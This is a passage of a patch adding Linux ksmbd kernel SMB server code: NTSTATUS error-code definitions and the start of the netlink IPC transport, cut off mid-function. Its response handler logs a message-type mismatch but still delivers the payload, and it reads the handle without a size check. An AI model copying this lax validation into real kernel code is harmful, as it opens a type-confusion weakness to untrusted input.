++#define STATUS_GRAPHICS_CLIENTVIDPN_NOT_SET cpu_to_le32(0xC01E035C)
++#define STATUS_GRAPHICS_SPECIFIED_CHILD_ALREADY_CONNECTED	\
++	cpu_to_le32(0xC01E0400)
++#define STATUS_GRAPHICS_CHILD_DESCRIPTOR_NOT_SUPPORTED cpu_to_le32(0xC01E0401)
++#define STATUS_GRAPHICS_NOT_A_LINKED_ADAPTER cpu_to_le32(0xC01E0430)
++#define STATUS_GRAPHICS_LEADLINK_NOT_ENUMERATED cpu_to_le32(0xC01E0431)
++#define STATUS_GRAPHICS_CHAINLINKS_NOT_ENUMERATED cpu_to_le32(0xC01E0432)
++#define STATUS_GRAPHICS_ADAPTER_CHAIN_NOT_READY cpu_to_le32(0xC01E0433)
++#define STATUS_GRAPHICS_CHAINLINKS_NOT_STARTED cpu_to_le32(0xC01E0434)
++#define STATUS_GRAPHICS_CHAINLINKS_NOT_POWERED_ON cpu_to_le32(0xC01E0435)
++#define STATUS_GRAPHICS_INCONSISTENT_DEVICE_LINK_STATE cpu_to_le32(0xC01E0436)
++#define STATUS_GRAPHICS_NOT_POST_DEVICE_DRIVER cpu_to_le32(0xC01E0438)
++#define STATUS_GRAPHICS_ADAPTER_ACCESS_NOT_EXCLUDED cpu_to_le32(0xC01E043B)
++#define STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_DOES_NOT_HAVE_COPP_SEMANTICS \
++	cpu_to_le32(0xC01E051C)
++#define STATUS_GRAPHICS_OPM_INVALID_INFORMATION_REQUEST cpu_to_le32(0xC01E051D)
++#define STATUS_GRAPHICS_OPM_DRIVER_INTERNAL_ERROR cpu_to_le32(0xC01E051E)
++#define STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_DOES_NOT_HAVE_OPM_SEMANTICS \
++	cpu_to_le32(0xC01E051F)
++#define STATUS_GRAPHICS_OPM_SIGNALING_NOT_SUPPORTED cpu_to_le32(0xC01E0520)
++#define STATUS_GRAPHICS_OPM_INVALID_CONFIGURATION_REQUEST	\
++	cpu_to_le32(0xC01E0521)
++#define STATUS_GRAPHICS_OPM_NOT_SUPPORTED cpu_to_le32(0xC01E0500)
++#define STATUS_GRAPHICS_COPP_NOT_SUPPORTED cpu_to_le32(0xC01E0501)
++#define STATUS_GRAPHICS_UAB_NOT_SUPPORTED cpu_to_le32(0xC01E0502)
++#define STATUS_GRAPHICS_OPM_INVALID_ENCRYPTED_PARAMETERS cpu_to_le32(0xC01E0503)
++#define STATUS_GRAPHICS_OPM_PARAMETER_ARRAY_TOO_SMALL cpu_to_le32(0xC01E0504)
++#define STATUS_GRAPHICS_OPM_NO_PROTECTED_OUTPUTS_EXIST cpu_to_le32(0xC01E0505)
++#define STATUS_GRAPHICS_PVP_NO_DISPLAY_DEVICE_CORRESPONDS_TO_NAME	\
++	cpu_to_le32(0xC01E0506)
++#define STATUS_GRAPHICS_PVP_DISPLAY_DEVICE_NOT_ATTACHED_TO_DESKTOP	\
++	cpu_to_le32(0xC01E0507)
++#define STATUS_GRAPHICS_PVP_MIRRORING_DEVICES_NOT_SUPPORTED	\
++	cpu_to_le32(0xC01E0508)
++#define STATUS_GRAPHICS_OPM_INVALID_POINTER cpu_to_le32(0xC01E050A)
++#define STATUS_GRAPHICS_OPM_INTERNAL_ERROR cpu_to_le32(0xC01E050B)
++#define STATUS_GRAPHICS_OPM_INVALID_HANDLE cpu_to_le32(0xC01E050C)
++#define STATUS_GRAPHICS_PVP_NO_MONITORS_CORRESPOND_TO_DISPLAY_DEVICE	\
++	cpu_to_le32(0xC01E050D)
++#define STATUS_GRAPHICS_PVP_INVALID_CERTIFICATE_LENGTH cpu_to_le32(0xC01E050E)
++#define STATUS_GRAPHICS_OPM_SPANNING_MODE_ENABLED cpu_to_le32(0xC01E050F)
++#define STATUS_GRAPHICS_OPM_THEATER_MODE_ENABLED cpu_to_le32(0xC01E0510)
++#define STATUS_GRAPHICS_PVP_HFS_FAILED cpu_to_le32(0xC01E0511)
++#define STATUS_GRAPHICS_OPM_INVALID_SRM cpu_to_le32(0xC01E0512)
++#define STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_HDCP cpu_to_le32(0xC01E0513)
++#define STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_ACP cpu_to_le32(0xC01E0514)
++#define STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_CGMSA	\
++	cpu_to_le32(0xC01E0515)
++#define STATUS_GRAPHICS_OPM_HDCP_SRM_NEVER_SET cpu_to_le32(0xC01E0516)
++#define STATUS_GRAPHICS_OPM_RESOLUTION_TOO_HIGH cpu_to_le32(0xC01E0517)
++#define STATUS_GRAPHICS_OPM_ALL_HDCP_HARDWARE_ALREADY_IN_USE	\
++	cpu_to_le32(0xC01E0518)
++#define STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_NO_LONGER_EXISTS	\
++	cpu_to_le32(0xC01E051A)
++#define STATUS_GRAPHICS_OPM_SESSION_TYPE_CHANGE_IN_PROGRESS	\
++	cpu_to_le32(0xC01E051B)
++#define STATUS_GRAPHICS_I2C_NOT_SUPPORTED cpu_to_le32(0xC01E0580)
++#define STATUS_GRAPHICS_I2C_DEVICE_DOES_NOT_EXIST cpu_to_le32(0xC01E0581)
++#define STATUS_GRAPHICS_I2C_ERROR_TRANSMITTING_DATA cpu_to_le32(0xC01E0582)
++#define STATUS_GRAPHICS_I2C_ERROR_RECEIVING_DATA cpu_to_le32(0xC01E0583)
++#define STATUS_GRAPHICS_DDCCI_VCP_NOT_SUPPORTED cpu_to_le32(0xC01E0584)
++#define STATUS_GRAPHICS_DDCCI_INVALID_DATA cpu_to_le32(0xC01E0585)
++#define STATUS_GRAPHICS_DDCCI_MONITOR_RETURNED_INVALID_TIMING_STATUS_BYTE \
++	cpu_to_le32(0xC01E0586)
++#define STATUS_GRAPHICS_DDCCI_INVALID_CAPABILITIES_STRING	\
++	cpu_to_le32(0xC01E0587)
++#define STATUS_GRAPHICS_MCA_INTERNAL_ERROR cpu_to_le32(0xC01E0588)
++#define STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_COMMAND cpu_to_le32(0xC01E0589)
++#define STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_LENGTH cpu_to_le32(0xC01E058A)
++#define STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_CHECKSUM cpu_to_le32(0xC01E058B)
++#define STATUS_GRAPHICS_INVALID_PHYSICAL_MONITOR_HANDLE cpu_to_le32(0xC01E058C)
++#define STATUS_GRAPHICS_MONITOR_NO_LONGER_EXISTS cpu_to_le32(0xC01E058D)
++#define STATUS_GRAPHICS_ONLY_CONSOLE_SESSION_SUPPORTED cpu_to_le32(0xC01E05E0)
++#define STATUS_GRAPHICS_NO_DISPLAY_DEVICE_CORRESPONDS_TO_NAME	\
++	cpu_to_le32(0xC01E05E1)
++#define STATUS_GRAPHICS_DISPLAY_DEVICE_NOT_ATTACHED_TO_DESKTOP	\
++	cpu_to_le32(0xC01E05E2)
++#define STATUS_GRAPHICS_MIRRORING_DEVICES_NOT_SUPPORTED cpu_to_le32(0xC01E05E3)
++#define STATUS_GRAPHICS_INVALID_POINTER cpu_to_le32(0xC01E05E4)
++#define STATUS_GRAPHICS_NO_MONITORS_CORRESPOND_TO_DISPLAY_DEVICE	\
++	cpu_to_le32(0xC01E05E5)
++#define STATUS_GRAPHICS_PARAMETER_ARRAY_TOO_SMALL cpu_to_le32(0xC01E05E6)
++#define STATUS_GRAPHICS_INTERNAL_ERROR cpu_to_le32(0xC01E05E7)
++#define STATUS_GRAPHICS_SESSION_TYPE_CHANGE_IN_PROGRESS cpu_to_le32(0xC01E05E8)
++#define STATUS_FVE_LOCKED_VOLUME cpu_to_le32(0xC0210000)
++#define STATUS_FVE_NOT_ENCRYPTED cpu_to_le32(0xC0210001)
++#define STATUS_FVE_BAD_INFORMATION cpu_to_le32(0xC0210002)
++#define STATUS_FVE_TOO_SMALL cpu_to_le32(0xC0210003)
++#define STATUS_FVE_FAILED_WRONG_FS cpu_to_le32(0xC0210004)
++#define STATUS_FVE_FAILED_BAD_FS cpu_to_le32(0xC0210005)
++#define STATUS_FVE_FS_NOT_EXTENDED cpu_to_le32(0xC0210006)
++#define STATUS_FVE_FS_MOUNTED cpu_to_le32(0xC0210007)
++#define STATUS_FVE_NO_LICENSE cpu_to_le32(0xC0210008)
++#define STATUS_FVE_ACTION_NOT_ALLOWED cpu_to_le32(0xC0210009)
++#define STATUS_FVE_BAD_DATA cpu_to_le32(0xC021000A)
++#define STATUS_FVE_VOLUME_NOT_BOUND cpu_to_le32(0xC021000B)
++#define STATUS_FVE_NOT_DATA_VOLUME cpu_to_le32(0xC021000C)
++#define STATUS_FVE_CONV_READ_ERROR cpu_to_le32(0xC021000D)
++#define STATUS_FVE_CONV_WRITE_ERROR cpu_to_le32(0xC021000E)
++#define STATUS_FVE_OVERLAPPED_UPDATE cpu_to_le32(0xC021000F)
++#define STATUS_FVE_FAILED_SECTOR_SIZE cpu_to_le32(0xC0210010)
++#define STATUS_FVE_FAILED_AUTHENTICATION cpu_to_le32(0xC0210011)
++#define STATUS_FVE_NOT_OS_VOLUME cpu_to_le32(0xC0210012)
++#define STATUS_FVE_KEYFILE_NOT_FOUND cpu_to_le32(0xC0210013)
++#define STATUS_FVE_KEYFILE_INVALID cpu_to_le32(0xC0210014)
++#define STATUS_FVE_KEYFILE_NO_VMK cpu_to_le32(0xC0210015)
++#define STATUS_FVE_TPM_DISABLED cpu_to_le32(0xC0210016)
++#define STATUS_FVE_TPM_SRK_AUTH_NOT_ZERO cpu_to_le32(0xC0210017)
++#define STATUS_FVE_TPM_INVALID_PCR cpu_to_le32(0xC0210018)
++#define STATUS_FVE_TPM_NO_VMK cpu_to_le32(0xC0210019)
++#define STATUS_FVE_PIN_INVALID cpu_to_le32(0xC021001A)
++#define STATUS_FVE_AUTH_INVALID_APPLICATION cpu_to_le32(0xC021001B)
++#define STATUS_FVE_AUTH_INVALID_CONFIG cpu_to_le32(0xC021001C)
++#define STATUS_FVE_DEBUGGER_ENABLED cpu_to_le32(0xC021001D)
++#define STATUS_FVE_DRY_RUN_FAILED cpu_to_le32(0xC021001E)
++#define STATUS_FVE_BAD_METADATA_POINTER cpu_to_le32(0xC021001F)
++#define STATUS_FVE_OLD_METADATA_COPY cpu_to_le32(0xC0210020)
++#define STATUS_FVE_REBOOT_REQUIRED cpu_to_le32(0xC0210021)
++#define STATUS_FVE_RAW_ACCESS cpu_to_le32(0xC0210022)
++#define STATUS_FVE_RAW_BLOCKED cpu_to_le32(0xC0210023)
++#define STATUS_FWP_CALLOUT_NOT_FOUND cpu_to_le32(0xC0220001)
++#define STATUS_FWP_CONDITION_NOT_FOUND cpu_to_le32(0xC0220002)
++#define STATUS_FWP_FILTER_NOT_FOUND cpu_to_le32(0xC0220003)
++#define STATUS_FWP_LAYER_NOT_FOUND cpu_to_le32(0xC0220004)
++#define STATUS_FWP_PROVIDER_NOT_FOUND cpu_to_le32(0xC0220005)
++#define STATUS_FWP_PROVIDER_CONTEXT_NOT_FOUND cpu_to_le32(0xC0220006)
++#define STATUS_FWP_SUBLAYER_NOT_FOUND cpu_to_le32(0xC0220007)
++#define STATUS_FWP_NOT_FOUND cpu_to_le32(0xC0220008)
++#define STATUS_FWP_ALREADY_EXISTS cpu_to_le32(0xC0220009)
++#define STATUS_FWP_IN_USE cpu_to_le32(0xC022000A)
++#define STATUS_FWP_DYNAMIC_SESSION_IN_PROGRESS cpu_to_le32(0xC022000B)
++#define STATUS_FWP_WRONG_SESSION cpu_to_le32(0xC022000C)
++#define STATUS_FWP_NO_TXN_IN_PROGRESS cpu_to_le32(0xC022000D)
++#define STATUS_FWP_TXN_IN_PROGRESS cpu_to_le32(0xC022000E)
++#define STATUS_FWP_TXN_ABORTED cpu_to_le32(0xC022000F)
++#define STATUS_FWP_SESSION_ABORTED cpu_to_le32(0xC0220010)
++#define STATUS_FWP_INCOMPATIBLE_TXN cpu_to_le32(0xC0220011)
++#define STATUS_FWP_TIMEOUT cpu_to_le32(0xC0220012)
++#define STATUS_FWP_NET_EVENTS_DISABLED cpu_to_le32(0xC0220013)
++#define STATUS_FWP_INCOMPATIBLE_LAYER cpu_to_le32(0xC0220014)
++#define STATUS_FWP_KM_CLIENTS_ONLY cpu_to_le32(0xC0220015)
++#define STATUS_FWP_LIFETIME_MISMATCH cpu_to_le32(0xC0220016)
++#define STATUS_FWP_BUILTIN_OBJECT cpu_to_le32(0xC0220017)
++#define STATUS_FWP_TOO_MANY_BOOTTIME_FILTERS cpu_to_le32(0xC0220018)
++#define STATUS_FWP_TOO_MANY_CALLOUTS cpu_to_le32(0xC0220018)
++#define STATUS_FWP_NOTIFICATION_DROPPED cpu_to_le32(0xC0220019)
++#define STATUS_FWP_TRAFFIC_MISMATCH cpu_to_le32(0xC022001A)
++#define STATUS_FWP_INCOMPATIBLE_SA_STATE cpu_to_le32(0xC022001B)
++#define STATUS_FWP_NULL_POINTER cpu_to_le32(0xC022001C)
++#define STATUS_FWP_INVALID_ENUMERATOR cpu_to_le32(0xC022001D)
++#define STATUS_FWP_INVALID_FLAGS cpu_to_le32(0xC022001E)
++#define STATUS_FWP_INVALID_NET_MASK cpu_to_le32(0xC022001F)
++#define STATUS_FWP_INVALID_RANGE cpu_to_le32(0xC0220020)
++#define STATUS_FWP_INVALID_INTERVAL cpu_to_le32(0xC0220021)
++#define STATUS_FWP_ZERO_LENGTH_ARRAY cpu_to_le32(0xC0220022)
++#define STATUS_FWP_NULL_DISPLAY_NAME cpu_to_le32(0xC0220023)
++#define STATUS_FWP_INVALID_ACTION_TYPE cpu_to_le32(0xC0220024)
++#define STATUS_FWP_INVALID_WEIGHT cpu_to_le32(0xC0220025)
++#define STATUS_FWP_MATCH_TYPE_MISMATCH cpu_to_le32(0xC0220026)
++#define STATUS_FWP_TYPE_MISMATCH cpu_to_le32(0xC0220027)
++#define STATUS_FWP_OUT_OF_BOUNDS cpu_to_le32(0xC0220028)
++#define STATUS_FWP_RESERVED cpu_to_le32(0xC0220029)
++#define STATUS_FWP_DUPLICATE_CONDITION cpu_to_le32(0xC022002A)
++#define STATUS_FWP_DUPLICATE_KEYMOD cpu_to_le32(0xC022002B)
++#define STATUS_FWP_ACTION_INCOMPATIBLE_WITH_LAYER cpu_to_le32(0xC022002C)
++#define STATUS_FWP_ACTION_INCOMPATIBLE_WITH_SUBLAYER cpu_to_le32(0xC022002D)
++#define STATUS_FWP_CONTEXT_INCOMPATIBLE_WITH_LAYER cpu_to_le32(0xC022002E)
++#define STATUS_FWP_CONTEXT_INCOMPATIBLE_WITH_CALLOUT cpu_to_le32(0xC022002F)
++#define STATUS_FWP_INCOMPATIBLE_AUTH_METHOD cpu_to_le32(0xC0220030)
++#define STATUS_FWP_INCOMPATIBLE_DH_GROUP cpu_to_le32(0xC0220031)
++#define STATUS_FWP_EM_NOT_SUPPORTED cpu_to_le32(0xC0220032)
++#define STATUS_FWP_NEVER_MATCH cpu_to_le32(0xC0220033)
++#define STATUS_FWP_PROVIDER_CONTEXT_MISMATCH cpu_to_le32(0xC0220034)
++#define STATUS_FWP_INVALID_PARAMETER cpu_to_le32(0xC0220035)
++#define STATUS_FWP_TOO_MANY_SUBLAYERS cpu_to_le32(0xC0220036)
++#define STATUS_FWP_CALLOUT_NOTIFICATION_FAILED cpu_to_le32(0xC0220037)
++#define STATUS_FWP_INCOMPATIBLE_AUTH_CONFIG cpu_to_le32(0xC0220038)
++#define STATUS_FWP_INCOMPATIBLE_CIPHER_CONFIG cpu_to_le32(0xC0220039)
++#define STATUS_FWP_TCPIP_NOT_READY cpu_to_le32(0xC0220100)
++#define STATUS_FWP_INJECT_HANDLE_CLOSING cpu_to_le32(0xC0220101)
++#define STATUS_FWP_INJECT_HANDLE_STALE cpu_to_le32(0xC0220102)
++#define STATUS_FWP_CANNOT_PEND cpu_to_le32(0xC0220103)
++#define STATUS_NDIS_CLOSING cpu_to_le32(0xC0230002)
++#define STATUS_NDIS_BAD_VERSION cpu_to_le32(0xC0230004)
++#define STATUS_NDIS_BAD_CHARACTERISTICS cpu_to_le32(0xC0230005)
++#define STATUS_NDIS_ADAPTER_NOT_FOUND cpu_to_le32(0xC0230006)
++#define STATUS_NDIS_OPEN_FAILED cpu_to_le32(0xC0230007)
++#define STATUS_NDIS_DEVICE_FAILED cpu_to_le32(0xC0230008)
++#define STATUS_NDIS_MULTICAST_FULL cpu_to_le32(0xC0230009)
++#define STATUS_NDIS_MULTICAST_EXISTS cpu_to_le32(0xC023000A)
++#define STATUS_NDIS_MULTICAST_NOT_FOUND cpu_to_le32(0xC023000B)
++#define STATUS_NDIS_REQUEST_ABORTED cpu_to_le32(0xC023000C)
++#define STATUS_NDIS_RESET_IN_PROGRESS cpu_to_le32(0xC023000D)
++#define STATUS_NDIS_INVALID_PACKET cpu_to_le32(0xC023000F)
++#define STATUS_NDIS_INVALID_DEVICE_REQUEST cpu_to_le32(0xC0230010)
++#define STATUS_NDIS_ADAPTER_NOT_READY cpu_to_le32(0xC0230011)
++#define STATUS_NDIS_INVALID_LENGTH cpu_to_le32(0xC0230014)
++#define STATUS_NDIS_INVALID_DATA cpu_to_le32(0xC0230015)
++#define STATUS_NDIS_BUFFER_TOO_SHORT cpu_to_le32(0xC0230016)
++#define STATUS_NDIS_INVALID_OID cpu_to_le32(0xC0230017)
++#define STATUS_NDIS_ADAPTER_REMOVED cpu_to_le32(0xC0230018)
++#define STATUS_NDIS_UNSUPPORTED_MEDIA cpu_to_le32(0xC0230019)
++#define STATUS_NDIS_GROUP_ADDRESS_IN_USE cpu_to_le32(0xC023001A)
++#define STATUS_NDIS_FILE_NOT_FOUND cpu_to_le32(0xC023001B)
++#define STATUS_NDIS_ERROR_READING_FILE cpu_to_le32(0xC023001C)
++#define STATUS_NDIS_ALREADY_MAPPED cpu_to_le32(0xC023001D)
++#define STATUS_NDIS_RESOURCE_CONFLICT cpu_to_le32(0xC023001E)
++#define STATUS_NDIS_MEDIA_DISCONNECTED cpu_to_le32(0xC023001F)
++#define STATUS_NDIS_INVALID_ADDRESS cpu_to_le32(0xC0230022)
++#define STATUS_NDIS_PAUSED cpu_to_le32(0xC023002A)
++#define STATUS_NDIS_INTERFACE_NOT_FOUND cpu_to_le32(0xC023002B)
++#define STATUS_NDIS_UNSUPPORTED_REVISION cpu_to_le32(0xC023002C)
++#define STATUS_NDIS_INVALID_PORT cpu_to_le32(0xC023002D)
++#define STATUS_NDIS_INVALID_PORT_STATE cpu_to_le32(0xC023002E)
++#define STATUS_NDIS_LOW_POWER_STATE cpu_to_le32(0xC023002F)
++#define STATUS_NDIS_NOT_SUPPORTED cpu_to_le32(0xC02300BB)
++#define STATUS_NDIS_DOT11_AUTO_CONFIG_ENABLED cpu_to_le32(0xC0232000)
++#define STATUS_NDIS_DOT11_MEDIA_IN_USE cpu_to_le32(0xC0232001)
++#define STATUS_NDIS_DOT11_POWER_STATE_INVALID cpu_to_le32(0xC0232002)
++#define STATUS_IPSEC_BAD_SPI cpu_to_le32(0xC0360001)
++#define STATUS_IPSEC_SA_LIFETIME_EXPIRED cpu_to_le32(0xC0360002)
++#define STATUS_IPSEC_WRONG_SA cpu_to_le32(0xC0360003)
++#define STATUS_IPSEC_REPLAY_CHECK_FAILED cpu_to_le32(0xC0360004)
++#define STATUS_IPSEC_INVALID_PACKET cpu_to_le32(0xC0360005)
++#define STATUS_IPSEC_INTEGRITY_CHECK_FAILED cpu_to_le32(0xC0360006)
++#define STATUS_IPSEC_CLEAR_TEXT_DROP cpu_to_le32(0xC0360007)
++
++#define STATUS_NO_PREAUTH_INTEGRITY_HASH_OVERLAP cpu_to_le32(0xC05D0000)
++#define STATUS_INVALID_LOCK_RANGE cpu_to_le32(0xC00001A1)
+diff --git a/fs/smb/server/transport_ipc.c b/fs/smb/server/transport_ipc.c
+new file mode 100644
+index 0000000000000..40c721f9227e4
+--- /dev/null
++++ b/fs/smb/server/transport_ipc.c
+@@ -0,0 +1,884 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#include <linux/jhash.h>
++#include <linux/slab.h>
++#include <linux/rwsem.h>
++#include <linux/mutex.h>
++#include <linux/wait.h>
++#include <linux/hashtable.h>
++#include <net/net_namespace.h>
++#include <net/genetlink.h>
++#include <linux/socket.h>
++#include <linux/workqueue.h>
++
++#include "vfs_cache.h"
++#include "transport_ipc.h"
++#include "server.h"
++#include "smb_common.h"
++
++#include "mgmt/user_config.h"
++#include "mgmt/share_config.h"
++#include "mgmt/user_session.h"
++#include "mgmt/tree_connect.h"
++#include "mgmt/ksmbd_ida.h"
++#include "connection.h"
++#include "transport_tcp.h"
++#include "transport_rdma.h"
++
++#define IPC_WAIT_TIMEOUT	(2 * HZ)
++
++#define IPC_MSG_HASH_BITS	3
++static DEFINE_HASHTABLE(ipc_msg_table, IPC_MSG_HASH_BITS);
++static DECLARE_RWSEM(ipc_msg_table_lock);
++static DEFINE_MUTEX(startup_lock);
++
++static DEFINE_IDA(ipc_ida);
++
++static unsigned int ksmbd_tools_pid;
++
++static bool ksmbd_ipc_validate_version(struct genl_info *m)
++{
++	if (m->genlhdr->version != KSMBD_GENL_VERSION) {
++		pr_err("%s. ksmbd: %d, kernel module: %d. %s.\n",
++		       "Daemon and kernel module version mismatch",
++		       m->genlhdr->version,
++		       KSMBD_GENL_VERSION,
++		       "User-space ksmbd should terminate");
++		return false;
++	}
++	return true;
++}
++
++struct ksmbd_ipc_msg {
++	unsigned int		type;
++	unsigned int		sz;
++	unsigned char		payload[];
++};
++
++struct ipc_msg_table_entry {
++	unsigned int		handle;
++	unsigned int		type;
++	wait_queue_head_t	wait;
++	struct hlist_node	ipc_table_hlist;
++
++	void			*response;
++};
++
++static struct delayed_work ipc_timer_work;
++
++static int handle_startup_event(struct sk_buff *skb, struct genl_info *info);
++static int handle_unsupported_event(struct sk_buff *skb, struct genl_info *info);
++static int handle_generic_event(struct sk_buff *skb, struct genl_info *info);
++static int ksmbd_ipc_heartbeat_request(void);
++
++static const struct nla_policy ksmbd_nl_policy[KSMBD_EVENT_MAX] = {
++	[KSMBD_EVENT_UNSPEC] = {
++		.len = 0,
++	},
++	[KSMBD_EVENT_HEARTBEAT_REQUEST] = {
++		.len = sizeof(struct ksmbd_heartbeat),
++	},
++	[KSMBD_EVENT_STARTING_UP] = {
++		.len = sizeof(struct ksmbd_startup_request),
++	},
++	[KSMBD_EVENT_SHUTTING_DOWN] = {
++		.len = sizeof(struct ksmbd_shutdown_request),
++	},
++	[KSMBD_EVENT_LOGIN_REQUEST] = {
++		.len = sizeof(struct ksmbd_login_request),
++	},
++	[KSMBD_EVENT_LOGIN_RESPONSE] = {
++		.len = sizeof(struct ksmbd_login_response),
++	},
++	[KSMBD_EVENT_SHARE_CONFIG_REQUEST] = {
++		.len = sizeof(struct ksmbd_share_config_request),
++	},
++	[KSMBD_EVENT_SHARE_CONFIG_RESPONSE] = {
++		.len = sizeof(struct ksmbd_share_config_response),
++	},
++	[KSMBD_EVENT_TREE_CONNECT_REQUEST] = {
++		.len = sizeof(struct ksmbd_tree_connect_request),
++	},
++	[KSMBD_EVENT_TREE_CONNECT_RESPONSE] = {
++		.len = sizeof(struct ksmbd_tree_connect_response),
++	},
++	[KSMBD_EVENT_TREE_DISCONNECT_REQUEST] = {
++		.len = sizeof(struct ksmbd_tree_disconnect_request),
++	},
++	[KSMBD_EVENT_LOGOUT_REQUEST] = {
++		.len = sizeof(struct ksmbd_logout_request),
++	},
++	[KSMBD_EVENT_RPC_REQUEST] = {
++	},
++	[KSMBD_EVENT_RPC_RESPONSE] = {
++	},
++	[KSMBD_EVENT_SPNEGO_AUTHEN_REQUEST] = {
++	},
++	[KSMBD_EVENT_SPNEGO_AUTHEN_RESPONSE] = {
++	},
++};
++
++static struct genl_ops ksmbd_genl_ops[] = {
++	{
++		.cmd	= KSMBD_EVENT_UNSPEC,
++		.doit	= handle_unsupported_event,
++	},
++	{
++		.cmd	= KSMBD_EVENT_HEARTBEAT_REQUEST,
++		.doit	= handle_unsupported_event,
++	},
++	{
++		.cmd	= KSMBD_EVENT_STARTING_UP,
++		.doit	= handle_startup_event,
++	},
++	{
++		.cmd	= KSMBD_EVENT_SHUTTING_DOWN,
++		.doit	= handle_unsupported_event,
++	},
++	{
++		.cmd	= KSMBD_EVENT_LOGIN_REQUEST,
++		.doit	= handle_unsupported_event,
++	},
++	{
++		.cmd	= KSMBD_EVENT_LOGIN_RESPONSE,
++		.doit	= handle_generic_event,
++	},
++	{
++		.cmd	= KSMBD_EVENT_SHARE_CONFIG_REQUEST,
++		.doit	= handle_unsupported_event,
++	},
++	{
++		.cmd	= KSMBD_EVENT_SHARE_CONFIG_RESPONSE,
++		.doit	= handle_generic_event,
++	},
++	{
++		.cmd	= KSMBD_EVENT_TREE_CONNECT_REQUEST,
++		.doit	= handle_unsupported_event,
++	},
++	{
++		.cmd	= KSMBD_EVENT_TREE_CONNECT_RESPONSE,
++		.doit	= handle_generic_event,
++	},
++	{
++		.cmd	= KSMBD_EVENT_TREE_DISCONNECT_REQUEST,
++		.doit	= handle_unsupported_event,
++	},
++	{
++		.cmd	= KSMBD_EVENT_LOGOUT_REQUEST,
++		.doit	= handle_unsupported_event,
++	},
++	{
++		.cmd	= KSMBD_EVENT_RPC_REQUEST,
++		.doit	= handle_unsupported_event,
++	},
++	{
++		.cmd	= KSMBD_EVENT_RPC_RESPONSE,
++		.doit	= handle_generic_event,
++	},
++	{
++		.cmd	= KSMBD_EVENT_SPNEGO_AUTHEN_REQUEST,
++		.doit	= handle_unsupported_event,
++	},
++	{
++		.cmd	= KSMBD_EVENT_SPNEGO_AUTHEN_RESPONSE,
++		.doit	= handle_generic_event,
++	},
++};
++
++static struct genl_family ksmbd_genl_family = {
++	.name		= KSMBD_GENL_NAME,
++	.version	= KSMBD_GENL_VERSION,
++	.hdrsize	= 0,
++	.maxattr	= KSMBD_EVENT_MAX,
++	.netnsok	= true,
++	.module		= THIS_MODULE,
++	.ops		= ksmbd_genl_ops,
++	.n_ops		= ARRAY_SIZE(ksmbd_genl_ops),
++	.resv_start_op	= KSMBD_EVENT_SPNEGO_AUTHEN_RESPONSE + 1,
++};
++
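++/*
++ * Adjust the generic netlink ops at runtime: relax per-op validation
++ * and attach the attribute policy before the family is registered.
++ */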
++static void ksmbd_nl_init_fixup(void)
++{
++	int i;
++
++	for (i = 0; i < ARRAY_SIZE(ksmbd_genl_ops); i++)
++		ksmbd_genl_ops[i].validate = GENL_DONT_VALIDATE_STRICT |
++						GENL_DONT_VALIDATE_DUMP;
++
++	ksmbd_genl_family.policy = ksmbd_nl_policy;
++}
++
++static int rpc_context_flags(struct ksmbd_session *sess)
++{
++	if (user_guest(sess->user))
++		return KSMBD_RPC_RESTRICTED_CONTEXT;
++	return 0;
++}
++
++static void ipc_update_last_active(void)
++{
++	if (server_conf.ipc_timeout)
++		server_conf.ipc_last_active = jiffies;
++}
++
++static struct ksmbd_ipc_msg *ipc_msg_alloc(size_t sz)
++{
++	struct ksmbd_ipc_msg *msg;
++	size_t msg_sz = sz + sizeof(struct ksmbd_ipc_msg);
++
++	msg = kvmalloc(msg_sz, GFP_KERNEL | __GFP_ZERO);
++	if (msg)
++		msg->sz = sz;
++	return msg;
++}
++
++static void ipc_msg_free(struct ksmbd_ipc_msg *msg)
++{
++	kvfree(msg);
++}
++
++static void ipc_msg_handle_free(int handle)
++{
++	if (handle >= 0)
++		ksmbd_release_id(&ipc_ida, handle);
++}
++
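++/*
++ * Match a daemon reply to the pending request with the same handle,
++ * copy the payload for the waiter and wake it up.  A response type
++ * mismatch is logged, but the payload is still delivered.
++ */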
++static int handle_response(int type, void *payload, size_t sz)
++{
++	unsigned int handle = *(unsigned int *)payload;
++	struct ipc_msg_table_entry *entry;
++	int ret = 0;
++
++	ipc_update_last_active();
++	down_read(&ipc_msg_table_lock);
++	hash_for_each_possible(ipc_msg_table, entry, ipc_table_hlist, handle) {
++		if (handle != entry->handle)
++			continue;
++
++		entry->response = NULL;
++		/*
++		 * Response message type value should be equal to
++		 * request message type + 1.
++		 */
++		if (entry->type + 1 != type) {
++			pr_err("Waiting for IPC type %d, got %d. Ignore.\n",
++			       entry->type + 1, type);
++		}
++
++		entry->response = kvmalloc(sz, GFP_KERNEL | __GFP_ZERO);
++		if (!entry->response) {
++			ret = -ENOMEM;
++			break;
++		}
++
++		memcpy(entry->response, payload, sz);
++		wake_up_interruptible(&entry->wait);
++		ret = 0;
++		break;
++	}
++	up_read(&ipc_msg_table_lock);
++
++	return ret;
++}
++
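++/* Apply the configuration carried by the daemon's STARTING_UP request. */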
++static int ipc_server_config_on_startup(struct ksmbd_startup_request *req)
++{
++	int ret;
++
++	ksmbd_set_fd_limit(req->file_max);
++	server_conf.flags = req->flags;
++	server_conf.signing = req->signing;
++	server_conf.tcp_port = req->tcp_port;
++	server_conf.ipc_timeout = req->ipc_timeout * HZ;
++	server_conf.deadtime = req->deadtime * SMB_ECHO_INTERVAL;
++	server_conf.share_fake_fscaps = req->share_fake_fscaps;
++	ksmbd_init_domain(req->sub_auth);
++
++	if (req->smb2_max_read)
++		init_smb2_max_read_size(req->smb2_max_read);
++	if (req->smb2_max_write)
++		init_smb2_max_write_size(req->smb2_max_write);
++	if (req->smb2_max_trans)
++		init_smb2_max_trans_size(req->smb2_max_trans);
++	if (req->smb2_max_credits)
++		init_smb2_max_credits(req->smb2_max_credits);
++	if (req->smbd_max_io_size)
++		init_smbd_max_io_size(req->smbd_max_io_size);
++
++	if (req->max_connections)
